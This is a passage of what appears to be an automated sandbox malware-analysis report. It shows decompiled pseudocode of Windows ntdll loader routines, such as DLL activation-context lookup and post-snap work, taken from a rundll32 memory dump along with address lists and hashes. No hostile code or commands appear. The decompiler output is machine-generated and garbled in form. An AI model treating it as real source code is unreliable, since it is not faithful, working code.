                                                                                            							do {
                                                                                            								 *_t277 = 0;
                                                                                            								_t278 = _t277 + 2;
                                                                                            								E0461BB40(_t257,  &_v68, _t243);
                                                                                            								if(L045E43C0( &_v68,  &_v24) != 0) {
                                                                                            									_t280 =  &(_t280[0]);
                                                                                            								}
                                                                                            								_t243 = _t278;
                                                                                            								_t277 = E04621370(_t278, 0x45b4e90);
                                                                                            								_pop(_t257);
                                                                                            							} while (_t277 != 0);
                                                                                            							_v48 = _t243;
                                                                                            							_t242 = _v52;
                                                                                            							goto L38;
                                                                                            						}
                                                                                            					}
                                                                                            					_t191 = _v12;
                                                                                            					_t260 = _v12 + 4;
                                                                                            					_v28 = _t260;
                                                                                            					if(_t260 == 0) {
                                                                                            						_t275 = _t280;
                                                                                            						_v16 = _t280;
                                                                                            					} else {
                                                                                            						_t275 = L045F4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                                            						_t191 = _v12;
                                                                                            						_v16 = _t275;
                                                                                            					}
                                                                                            					if(_t275 == 0) {
                                                                                            						_v28 = _t280;
                                                                                            						_t280 = 0xc0000017;
                                                                                            						goto L47;
                                                                                            					} else {
                                                                                            						E0461F3E0(_t275, _v8, _t191);
                                                                                            						_t285 = _t285 + 0xc;
                                                                                            						_v48 = _t275;
                                                                                            						_t279 = _t280;
                                                                                            						_t281 = E04621370(_v16, 0x45b4e90);
                                                                                            						_pop(_t262);
                                                                                            						if(_t281 != 0) {
                                                                                            							_t244 = _v48;
                                                                                            							do {
                                                                                            								 *_t281 = 0;
                                                                                            								_t282 = _t281 + 2;
                                                                                            								E0461BB40(_t262,  &_v68, _t244);
                                                                                            								if(L045E43C0( &_v68,  &_v24) != 0) {
                                                                                            									_t279 =  &(_t279[0]);
                                                                                            								}
                                                                                            								_t244 = _t282;
                                                                                            								_t281 = E04621370(_t282, 0x45b4e90);
                                                                                            								_pop(_t262);
                                                                                            							} while (_t281 != 0);
                                                                                            							_v48 = _t244;
                                                                                            							_t242 = _v52;
                                                                                            						}
                                                                                            						_t201 = _v48;
                                                                                            						_t280 = 0;
                                                                                            						if( *_v48 != 0) {
                                                                                            							E0461BB40(_t262,  &_v68, _t201);
                                                                                            							if(L045E43C0( &_v68,  &_v24) != 0) {
                                                                                            								_t279 =  &(_t279[0]);
                                                                                            							}
                                                                                            						}
                                                                                            						if(_t279 == 0) {
                                                                                            							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                                            							_v28 = _t280;
                                                                                            							_v16 = _t280;
                                                                                            						}
                                                                                            						_t202 = _v8;
                                                                                            						if(_v8 != 0) {
                                                                                            							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                                            						}
                                                                                            						_v8 = _t280;
                                                                                            						goto L28;
                                                                                            					}
                                                                                            				}
                                                                                            				_t214 = _v12;
                                                                                            				_t264 = _v12 + 4;
                                                                                            				_v40 = _t264;
                                                                                            				if(_t264 == 0) {
                                                                                            					_v20 = _t280;
                                                                                            				} else {
                                                                                            					_t236 = L045F4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                                            					_t280 = _t236;
                                                                                            					_v20 = _t236;
                                                                                            					_t214 = _v12;
                                                                                            				}
                                                                                            				if(_t280 == 0) {
                                                                                            					_t161 = 0;
                                                                                            					_t280 = 0xc0000017;
                                                                                            					_v40 = 0;
                                                                                            					goto L48;
                                                                                            				} else {
                                                                                            					E0461F3E0(_t280, _v8, _t214);
                                                                                            					_t285 = _t285 + 0xc;
                                                                                            					_v48 = _t280;
                                                                                            					_t283 = E04621370(_t280, 0x45b4e90);
                                                                                            					_pop(_t267);
                                                                                            					if(_t283 != 0) {
                                                                                            						_t245 = _v48;
                                                                                            						do {
                                                                                            							 *_t283 = 0;
                                                                                            							_t284 = _t283 + 2;
                                                                                            							E0461BB40(_t267,  &_v68, _t245);
                                                                                            							if(L045E43C0( &_v68,  &_v24) != 0) {
                                                                                            								_t275 = _t275 + 1;
                                                                                            							}
                                                                                            							_t245 = _t284;
                                                                                            							_t283 = E04621370(_t284, 0x45b4e90);
                                                                                            							_pop(_t267);
                                                                                            						} while (_t283 != 0);
                                                                                            						_v48 = _t245;
                                                                                            						_t242 = _v52;
                                                                                            					}
                                                                                            					_t224 = _v48;
                                                                                            					_t280 = 0;
                                                                                            					if( *_v48 != 0) {
                                                                                            						E0461BB40(_t267,  &_v68, _t224);
                                                                                            						if(L045E43C0( &_v68,  &_v24) != 0) {
                                                                                            							_t275 = _t275 + 1;
                                                                                            						}
                                                                                            					}
                                                                                            					if(_t275 == 0) {
                                                                                            						L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                                            						_v40 = _t280;
                                                                                            						_v20 = _t280;
                                                                                            					}
                                                                                            					_t225 = _v8;
                                                                                            					if(_v8 != 0) {
                                                                                            						L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                                            					}
                                                                                            					_v8 = _t280;
                                                                                            					goto L16;
                                                                                            				}
                                                                                            			}

                                                                                            0x045e3f6d
                                                                                            0x045e3f84
                                                                                            0x045e406b
                                                                                            0x045e406b
                                                                                            0x045e406e
                                                                                            0x045e406e
                                                                                            0x045e4070
                                                                                            0x045e4074
                                                                                            0x04638351
                                                                                            0x04638351
                                                                                            0x045e407a
                                                                                            0x045e407f
                                                                                            0x0463835d
                                                                                            0x04638370
                                                                                            0x04638377
                                                                                            0x04638379
                                                                                            0x0463837c
                                                                                            0x0463837c
                                                                                            0x0463835d
                                                                                            0x00000000
                                                                                            0x045e407f
                                                                                            0x045e3f8a
                                                                                            0x045e3f8d
                                                                                            0x045e3f90
                                                                                            0x045e3f95
                                                                                            0x0463830d
                                                                                            0x0463830f
                                                                                            0x045e3f9b
                                                                                            0x045e3fac
                                                                                            0x045e3fae
                                                                                            0x045e3fb1
                                                                                            0x045e3fb1
                                                                                            0x045e3fb6
                                                                                            0x04638317
                                                                                            0x0463831a
                                                                                            0x00000000
                                                                                            0x045e3fbc
                                                                                            0x045e3fc1
                                                                                            0x045e3fc9
                                                                                            0x045e3fd7
                                                                                            0x045e3fda
                                                                                            0x045e3fdd
                                                                                            0x045e4021
                                                                                            0x045e4021
                                                                                            0x045e4029
                                                                                            0x045e4030
                                                                                            0x045e4044
                                                                                            0x045e4046
                                                                                            0x045e4046
                                                                                            0x045e4044
                                                                                            0x045e4049
                                                                                            0x04638327
                                                                                            0x04638334
                                                                                            0x04638339
                                                                                            0x0463833c
                                                                                            0x045e404f
                                                                                            0x045e404f
                                                                                            0x045e404f
                                                                                            0x045e4051
                                                                                            0x045e4056
                                                                                            0x045e4063
                                                                                            0x045e4063
                                                                                            0x045e4068
                                                                                            0x00000000
                                                                                            0x045e4068
                                                                                            0x045e3fdf
                                                                                            0x045e3fe2
                                                                                            0x045e3fe4
                                                                                            0x045e3fe7
                                                                                            0x045e3fef
                                                                                            0x045e4003
                                                                                            0x045e4005
                                                                                            0x045e4005
                                                                                            0x045e400c
                                                                                            0x045e4013
                                                                                            0x045e4016
                                                                                            0x045e4017
                                                                                            0x045e401b
                                                                                            0x045e401e
                                                                                            0x00000000
                                                                                            0x045e401e
                                                                                            0x045e3fb6
                                                                                            0x045e3eb1
                                                                                            0x045e3eb4
                                                                                            0x045e3eb7
                                                                                            0x045e3ebc
                                                                                            0x046382a9
                                                                                            0x046382ab
                                                                                            0x045e3ec2
                                                                                            0x045e3ed3
                                                                                            0x045e3ed5
                                                                                            0x045e3ed8
                                                                                            0x045e3ed8
                                                                                            0x045e3edd
                                                                                            0x046382b3
                                                                                            0x046382b6
                                                                                            0x00000000
                                                                                            0x045e3ee3
                                                                                            0x045e3ee8
                                                                                            0x045e3eed
                                                                                            0x045e3ef0
                                                                                            0x045e3ef3
                                                                                            0x045e3f02
                                                                                            0x045e3f05
                                                                                            0x045e3f08
                                                                                            0x046382c0
                                                                                            0x046382c3
                                                                                            0x046382c5
                                                                                            0x046382c8
                                                                                            0x046382d0
                                                                                            0x046382e4
                                                                                            0x046382e6
                                                                                            0x046382e6
                                                                                            0x046382ed
                                                                                            0x046382f4
                                                                                            0x046382f7
                                                                                            0x046382f8
                                                                                            0x046382fc
                                                                                            0x046382ff
                                                                                            0x046382ff
                                                                                            0x045e3f0e
                                                                                            0x045e3f11
                                                                                            0x045e3f16
                                                                                            0x045e3f1d
                                                                                            0x045e3f31
                                                                                            0x04638307
                                                                                            0x04638307
                                                                                            0x045e3f31
                                                                                            0x045e3f39
                                                                                            0x045e3f48
                                                                                            0x045e3f4d
                                                                                            0x045e3f50
                                                                                            0x045e3f50
                                                                                            0x045e3f53
                                                                                            0x045e3f58
                                                                                            0x045e3f65
                                                                                            0x045e3f65
                                                                                            0x045e3f6a
                                                                                            0x00000000
                                                                                            0x045e3f6a
                                                                                            0x045e3edd
                                                                                            0x045e3dda
                                                                                            0x045e3ddd
                                                                                            0x045e3de0
                                                                                            0x045e3de5
                                                                                            0x04638245
                                                                                            0x045e3deb
                                                                                            0x045e3df7
                                                                                            0x045e3dfc
                                                                                            0x045e3dfe
                                                                                            0x045e3e01
                                                                                            0x045e3e01
                                                                                            0x045e3e06
                                                                                            0x0463824d
                                                                                            0x0463824f
                                                                                            0x04638254
                                                                                            0x00000000
                                                                                            0x045e3e0c
                                                                                            0x045e3e11
                                                                                            0x045e3e16
                                                                                            0x045e3e19
                                                                                            0x045e3e29
                                                                                            0x045e3e2c
                                                                                            0x045e3e2f
                                                                                            0x0463825c
                                                                                            0x0463825f
                                                                                            0x04638261
                                                                                            0x04638264
                                                                                            0x0463826c
                                                                                            0x04638280
                                                                                            0x04638282
                                                                                            0x04638282
                                                                                            0x04638289
                                                                                            0x04638290
                                                                                            0x04638293
                                                                                            0x04638294
                                                                                            0x04638298
                                                                                            0x0463829b
                                                                                            0x0463829b
                                                                                            0x045e3e35
                                                                                            0x045e3e38
                                                                                            0x045e3e3d
                                                                                            0x045e3e44
                                                                                            0x045e3e58
                                                                                            0x046382a3
                                                                                            0x046382a3
                                                                                            0x045e3e58
                                                                                            0x045e3e60
                                                                                            0x045e3e6f
                                                                                            0x045e3e74
                                                                                            0x045e3e77
                                                                                            0x045e3e77
                                                                                            0x045e3e7a
                                                                                            0x045e3e7f
                                                                                            0x045e3e8c
                                                                                            0x045e3e8c
                                                                                            0x045e3e91
                                                                                            0x00000000
                                                                                            0x045e3e91

                                                                                            Strings
                                                                                            • Kernel-MUI-Language-SKU, xrefs: 045E3F70
                                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 045E3E97
                                                                                            • WindowsExcludedProcs, xrefs: 045E3D6F
                                                                                            • Kernel-MUI-Language-Allowed, xrefs: 045E3DC0
                                                                                            • Kernel-MUI-Number-Allowed, xrefs: 045E3D8C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                            • API String ID: 0-258546922
                                                                                            • Opcode ID: 841e70cfd7866bc90c79a6dd58c1fbc064638b984af45d29c390333197dc4f19
                                                                                            • Instruction ID: 776bfb1611f9cb4123152917568eeccce037b025c1e2d4575ae7425ddf94209f
                                                                                            • Opcode Fuzzy Hash: 841e70cfd7866bc90c79a6dd58c1fbc064638b984af45d29c390333197dc4f19
                                                                                            • Instruction Fuzzy Hash: 78F16972D00659EFDB15DF99C980AEEBBB9FF49740F14006AE905A7211E734BE01DBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 44%
                                                                                            			E04608E00(void* __ecx) {
                                                                                            				signed int _v8;
                                                                                            				char _v12;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				intOrPtr* _t32;
                                                                                            				intOrPtr _t35;
                                                                                            				intOrPtr _t43;
                                                                                            				void* _t46;
                                                                                            				intOrPtr _t47;
                                                                                            				void* _t48;
                                                                                            				signed int _t49;
                                                                                            				void* _t50;
                                                                                            				intOrPtr* _t51;
                                                                                            				signed int _t52;
                                                                                            				void* _t53;
                                                                                            				intOrPtr _t55;
                                                                                            
                                                                                            				_v8 =  *0x46cd360 ^ _t52;
                                                                                            				_t49 = 0;
                                                                                            				_t48 = __ecx;
                                                                                            				_t55 =  *0x46c8464; // 0x76d90110
                                                                                            				if(_t55 == 0) {
                                                                                            					L9:
                                                                                            					if( !_t49 >= 0) {
                                                                                            						if(( *0x46c5780 & 0x00000003) != 0) {
                                                                                            							E04655510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                                            						}
                                                                                            						if(( *0x46c5780 & 0x00000010) != 0) {
                                                                                            							asm("int3");
                                                                                            						}
                                                                                            					}
                                                                                            					return E0461B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                                            				}
                                                                                            				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                            				_t43 =  *0x46c7984; // 0x29e2af0
                                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                                            					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                                            					if(_t48 == _t43) {
                                                                                            						_t50 = 0x5c;
                                                                                            						if( *_t32 == _t50) {
                                                                                            							_t46 = 0x3f;
                                                                                            							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                                            								_t32 = _t32 + 8;
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            					_t51 =  *0x46c8464; // 0x76d90110
                                                                                            					 *0x46cb1e0(_t47, _t32,  &_v12);
                                                                                            					_t49 =  *_t51();
                                                                                            					if(_t49 >= 0) {
                                                                                            						L8:
                                                                                            						_t35 = _v12;
                                                                                            						if(_t35 != 0) {
                                                                                            							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                                            								E04609B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                                            								_t35 = _v12;
                                                                                            							}
                                                                                            							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                                            						}
                                                                                            						goto L9;
                                                                                            					}
                                                                                            					if(_t49 != 0xc000008a) {
                                                                                            						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                                            							if(_t49 != 0xc00000bb) {
                                                                                            								goto L8;
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            					if(( *0x46c5780 & 0x00000005) != 0) {
                                                                                            						_push(_t49);
                                                                                            						E04655510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                                            						_t53 = _t53 + 0x1c;
                                                                                            					}
                                                                                            					_t49 = 0;
                                                                                            					goto L8;
                                                                                            				} else {
                                                                                            					goto L9;
                                                                                            				}
                                                                                            			}





















                                                                                            Strings
                                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0464932A
                                                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 04649357
                                                                                            • LdrpFindDllActivationContext, xrefs: 04649331, 0464935D
                                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 0464933B, 04649367
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                            • API String ID: 0-3779518884
                                                                                            • Opcode ID: 185713b75761d9afc47b71bbd1b56c62d5bd74c56ea888948e88c3e5dd1b572b
                                                                                            • Instruction ID: 0b2a43a0e428a1f748529fc99dbbea678111f5ffa0b9d3a8d9a8126c5d5e63bc
                                                                                            • Opcode Fuzzy Hash: 185713b75761d9afc47b71bbd1b56c62d5bd74c56ea888948e88c3e5dd1b572b
                                                                                            • Instruction Fuzzy Hash: EF41F232A40315AFDB29FE18C849A7BB7A5BB65354F09C16AE944572D2F770BC8086C1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 83%
                                                                                            			E045E8794(void* __ecx) {
                                                                                            				signed int _v0;
                                                                                            				char _v8;
                                                                                            				signed int _v12;
                                                                                            				void* _v16;
                                                                                            				signed int _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				signed int _v28;
                                                                                            				signed int _v32;
                                                                                            				signed int _v40;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				void* __ebp;
                                                                                            				intOrPtr* _t77;
                                                                                            				signed int _t80;
                                                                                            				signed char _t81;
                                                                                            				signed int _t87;
                                                                                            				signed int _t91;
                                                                                            				void* _t92;
                                                                                            				void* _t94;
                                                                                            				signed int _t95;
                                                                                            				signed int _t103;
                                                                                            				signed int _t105;
                                                                                            				signed int _t110;
                                                                                            				signed int _t118;
                                                                                            				intOrPtr* _t121;
                                                                                            				intOrPtr _t122;
                                                                                            				signed int _t125;
                                                                                            				signed int _t129;
                                                                                            				signed int _t131;
                                                                                            				signed int _t134;
                                                                                            				signed int _t136;
                                                                                            				signed int _t143;
                                                                                            				signed int* _t147;
                                                                                            				signed int _t151;
                                                                                            				void* _t153;
                                                                                            				signed int* _t157;
                                                                                            				signed int _t159;
                                                                                            				signed int _t161;
                                                                                            				signed int _t166;
                                                                                            				signed int _t168;
                                                                                            
                                                                                            				_push(__ecx);
                                                                                            				_t153 = __ecx;
                                                                                            				_t159 = 0;
                                                                                            				_t121 = __ecx + 0x3c;
                                                                                            				if( *_t121 == 0) {
                                                                                            					L2:
                                                                                            					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                                            					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                                            						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                                            						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                                            						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                                            							L6:
                                                                                            							if(E045E934A() != 0) {
                                                                                            								_t159 = E0465A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                                            								__eflags = _t159;
                                                                                            								if(_t159 < 0) {
                                                                                            									_t81 =  *0x46c5780; // 0x0
                                                                                            									__eflags = _t81 & 0x00000003;
                                                                                            									if((_t81 & 0x00000003) != 0) {
                                                                                            										_push(_t159);
                                                                                            										E04655510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                                            										_t81 =  *0x46c5780; // 0x0
                                                                                            									}
                                                                                            									__eflags = _t81 & 0x00000010;
                                                                                            									if((_t81 & 0x00000010) != 0) {
                                                                                            										asm("int3");
                                                                                            									}
                                                                                            								}
                                                                                            							}
                                                                                            						} else {
                                                                                            							_t159 = E045E849B(0, _t122, _t153, _t159, _t180);
                                                                                            							if(_t159 >= 0) {
                                                                                            								goto L6;
                                                                                            							}
                                                                                            						}
                                                                                            						_t80 = _t159;
                                                                                            						goto L8;
                                                                                            					} else {
                                                                                            						_t125 = 0x13;
                                                                                            						asm("int 0x29");
                                                                                            						_push(0);
                                                                                            						_push(_t159);
                                                                                            						_t161 = _t125;
                                                                                            						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                                            						_t143 = 0;
                                                                                            						_v40 = _t161;
                                                                                            						_t118 = 0;
                                                                                            						_push(_t153);
                                                                                            						__eflags = _t87;
                                                                                            						if(_t87 != 0) {
                                                                                            							_t118 = _t87 + 0x5d8;
                                                                                            							__eflags = _t118;
                                                                                            							if(_t118 == 0) {
                                                                                            								L46:
                                                                                            								_t118 = 0;
                                                                                            							} else {
                                                                                            								__eflags =  *(_t118 + 0x30);
                                                                                            								if( *(_t118 + 0x30) == 0) {
                                                                                            									goto L46;
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            						_v32 = 0;
                                                                                            						_v28 = 0;
                                                                                            						_v16 = 0;
                                                                                            						_v20 = 0;
                                                                                            						_v12 = 0;
                                                                                            						__eflags = _t118;
                                                                                            						if(_t118 != 0) {
                                                                                            							__eflags = _t161;
                                                                                            							if(_t161 != 0) {
                                                                                            								__eflags =  *(_t118 + 8);
                                                                                            								if( *(_t118 + 8) == 0) {
                                                                                            									L22:
                                                                                            									_t143 = 1;
                                                                                            									__eflags = 1;
                                                                                            								} else {
                                                                                            									_t19 = _t118 + 0x40; // 0x40
                                                                                            									_t156 = _t19;
                                                                                            									E045E8999(_t19,  &_v16);
                                                                                            									__eflags = _v0;
                                                                                            									if(_v0 != 0) {
                                                                                            										__eflags = _v0 - 1;
                                                                                            										if(_v0 != 1) {
                                                                                            											goto L22;
                                                                                            										} else {
                                                                                            											_t128 =  *(_t161 + 0x64);
                                                                                            											__eflags =  *(_t161 + 0x64);
                                                                                            											if( *(_t161 + 0x64) == 0) {
                                                                                            												goto L22;
                                                                                            											} else {
                                                                                            												E045E8999(_t128,  &_v12);
                                                                                            												_t147 = _v12;
                                                                                            												_t91 = 0;
                                                                                            												__eflags = 0;
                                                                                            												_t129 =  *_t147;
                                                                                            												while(1) {
                                                                                            													__eflags =  *((intOrPtr*)(0x46c5c60 + _t91 * 8)) - _t129;
                                                                                            													if( *((intOrPtr*)(0x46c5c60 + _t91 * 8)) == _t129) {
                                                                                            														break;
                                                                                            													}
                                                                                            													_t91 = _t91 + 1;
                                                                                            													__eflags = _t91 - 5;
                                                                                            													if(_t91 < 5) {
                                                                                            														continue;
                                                                                            													} else {
                                                                                            														_t131 = 0;
                                                                                            														__eflags = 0;
                                                                                            													}
                                                                                            													L37:
                                                                                            													__eflags = _t131;
                                                                                            													if(_t131 != 0) {
                                                                                            														goto L22;
                                                                                            													} else {
                                                                                            														__eflags = _v16 - _t147;
                                                                                            														if(_v16 != _t147) {
                                                                                            															goto L22;
                                                                                            														} else {
                                                                                            															E045F2280(_t92, 0x46c86cc);
                                                                                            															_t94 = E046A9DFB( &_v20);
                                                                                            															__eflags = _t94 - 1;
                                                                                            															if(_t94 != 1) {
                                                                                            															}
                                                                                            															asm("movsd");
                                                                                            															asm("movsd");
                                                                                            															asm("movsd");
                                                                                            															asm("movsd");
                                                                                            															 *_t118 =  *_t118 + 1;
                                                                                            															asm("adc dword [ebx+0x4], 0x0");
                                                                                            															_t95 = E046061A0( &_v32);
                                                                                            															__eflags = _t95;
                                                                                            															if(_t95 != 0) {
                                                                                            																__eflags = _v32 | _v28;
                                                                                            																if((_v32 | _v28) != 0) {
                                                                                            																	_t71 = _t118 + 0x40; // 0x3f
                                                                                            																	_t134 = _t71;
                                                                                            																	goto L55;
                                                                                            																}
                                                                                            															}
                                                                                            															goto L30;
                                                                                            														}
                                                                                            													}
                                                                                            													goto L56;
                                                                                            												}
                                                                                            												_t92 = 0x46c5c64 + _t91 * 8;
                                                                                            												asm("lock xadd [eax], ecx");
                                                                                            												_t131 = (_t129 | 0xffffffff) - 1;
                                                                                            												goto L37;
                                                                                            											}
                                                                                            										}
                                                                                            										goto L56;
                                                                                            									} else {
                                                                                            										_t143 = E045E8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                                            										__eflags = _t143;
                                                                                            										if(_t143 != 0) {
                                                                                            											_t157 = _v12;
                                                                                            											_t103 = 0;
                                                                                            											__eflags = 0;
                                                                                            											_t136 =  &(_t157[1]);
                                                                                            											 *(_t161 + 0x64) = _t136;
                                                                                            											_t151 =  *_t157;
                                                                                            											_v20 = _t136;
                                                                                            											while(1) {
                                                                                            												__eflags =  *((intOrPtr*)(0x46c5c60 + _t103 * 8)) - _t151;
                                                                                            												if( *((intOrPtr*)(0x46c5c60 + _t103 * 8)) == _t151) {
                                                                                            													break;
                                                                                            												}
                                                                                            												_t103 = _t103 + 1;
                                                                                            												__eflags = _t103 - 5;
                                                                                            												if(_t103 < 5) {
                                                                                            													continue;
                                                                                            												}
                                                                                            												L21:
                                                                                            												_t105 = E0461F380(_t136, 0x45b1184, 0x10);
                                                                                            												__eflags = _t105;
                                                                                            												if(_t105 != 0) {
                                                                                            													__eflags =  *_t157 -  *_v16;
                                                                                            													if( *_t157 >=  *_v16) {
                                                                                            														goto L22;
                                                                                            													} else {
                                                                                            														asm("cdq");
                                                                                            														_t166 = _t157[5] & 0x0000ffff;
                                                                                            														_t108 = _t157[5] & 0x0000ffff;
                                                                                            														asm("cdq");
                                                                                            														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                                            														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                                            														if(__eflags > 0) {
                                                                                            															L29:
                                                                                            															E045F2280(_t108, 0x46c86cc);
                                                                                            															 *_t118 =  *_t118 + 1;
                                                                                            															_t42 = _t118 + 0x40; // 0x3f
                                                                                            															_t156 = _t42;
                                                                                            															asm("adc dword [ebx+0x4], 0x0");
                                                                                            															asm("movsd");
                                                                                            															asm("movsd");
                                                                                            															asm("movsd");
                                                                                            															asm("movsd");
                                                                                            															_t110 = E046061A0( &_v32);
                                                                                            															__eflags = _t110;
                                                                                            															if(_t110 != 0) {
                                                                                            																__eflags = _v32 | _v28;
                                                                                            																if((_v32 | _v28) != 0) {
                                                                                            																	_t134 = _v20;
                                                                                            																	L55:
                                                                                            																	E046A9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                                            																}
                                                                                            															}
                                                                                            															L30:
                                                                                            															 *_t118 =  *_t118 + 1;
                                                                                            															asm("adc dword [ebx+0x4], 0x0");
                                                                                            															E045EFFB0(_t118, _t156, 0x46c86cc);
                                                                                            															goto L22;
                                                                                            														} else {
                                                                                            															if(__eflags < 0) {
                                                                                            																goto L22;
                                                                                            															} else {
                                                                                            																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                                            																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                                            																	goto L22;
                                                                                            																} else {
                                                                                            																	goto L29;
                                                                                            																}
                                                                                            															}
                                                                                            														}
                                                                                            													}
                                                                                            													goto L56;
                                                                                            												}
                                                                                            												goto L22;
                                                                                            											}
                                                                                            											asm("lock inc dword [eax]");
                                                                                            											goto L21;
                                                                                            										}
                                                                                            									}
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            						return _t143;
                                                                                            					}
                                                                                            				} else {
                                                                                            					_push( &_v8);
                                                                                            					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                                            					_push(__ecx + 0x40);
                                                                                            					_push(_t121);
                                                                                            					_push(0xffffffff);
                                                                                            					_t80 = E04619A00();
                                                                                            					_t159 = _t80;
                                                                                            					if(_t159 < 0) {
                                                                                            						L8:
                                                                                            						return _t80;
                                                                                            					} else {
                                                                                            						goto L2;
                                                                                            					}
                                                                                            				}
                                                                                            				L56:
                                                                                            			}












































                                                                                            0x00000000
                                                                                            0x045e889a
                                                                                            0x045e889b
                                                                                            0x045e889e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e88a0
                                                                                            0x045e88a8
                                                                                            0x045e88b0
                                                                                            0x045e88b2
                                                                                            0x045e88d3
                                                                                            0x045e88d5
                                                                                            0x00000000
                                                                                            0x045e88d7
                                                                                            0x045e88db
                                                                                            0x045e88dc
                                                                                            0x045e88e0
                                                                                            0x045e88e8
                                                                                            0x045e88ee
                                                                                            0x045e88f0
                                                                                            0x045e88f3
                                                                                            0x045e88fc
                                                                                            0x045e8901
                                                                                            0x045e8906
                                                                                            0x045e890c
                                                                                            0x045e890c
                                                                                            0x045e890f
                                                                                            0x045e8916
                                                                                            0x045e8917
                                                                                            0x045e8918
                                                                                            0x045e8919
                                                                                            0x045e891a
                                                                                            0x045e891f
                                                                                            0x045e8921
                                                                                            0x04639c52
                                                                                            0x04639c55
                                                                                            0x04639c5b
                                                                                            0x04639cac
                                                                                            0x04639cc0
